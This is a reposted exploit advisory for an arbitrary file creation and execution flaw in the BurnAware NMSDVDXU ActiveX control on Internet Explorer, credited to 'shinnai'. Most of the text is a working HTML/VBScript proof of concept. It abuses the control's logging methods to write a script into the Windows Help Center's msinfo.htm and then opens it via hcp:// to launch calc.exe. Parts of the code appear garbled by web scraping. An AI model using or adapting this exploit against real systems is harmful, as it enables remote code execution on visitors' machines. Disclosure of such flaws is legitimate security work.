-----------------------------------------------------------------------------
BurnAware NMSDVDXU ActiveX Control Remote Arbitrary File Creation/Execution
url: http://www.burnaware.comFile:   NMSDVDXU.dll <= 1.0.0.13
CLSID:  {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
ProgID: NMSDVDX.DVDEngineX.1
Descr.: DVDEngineX ClassMarked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,dataAuthor: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.netThis was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7myMsinfo is just hexadecimal values of:<object classid='clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8' id='compatUI'></object>
<script language='vbscript'>
compatUI.RunApplication 1, "calc.exe", 1
</script>
-----------------------------------------------------------------------------
<object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='test'></object><input language=VBScript onclick=tryMe() type=button value='Click here to start the test'><script language='vbscript'>
Sub tryMe
  myMsinfo = unescape("<script la") & _br /             unescape("nguage='vbscript") & _br /             unescape("'>compatUI.Run") & _
             unescape("Application 1, "") & _
             unescape("calc.exe", 1")  test.Initialize True
  test.EnableLog "C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System\\sysinfo\\msinfo.htm", True
  test.LogMessage myMsinfo  window.location = "hcp://system/sysinfo/msinfo.htm"
End Sub
</script>


来源：https://www.jb51.net/hack/5621.html
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！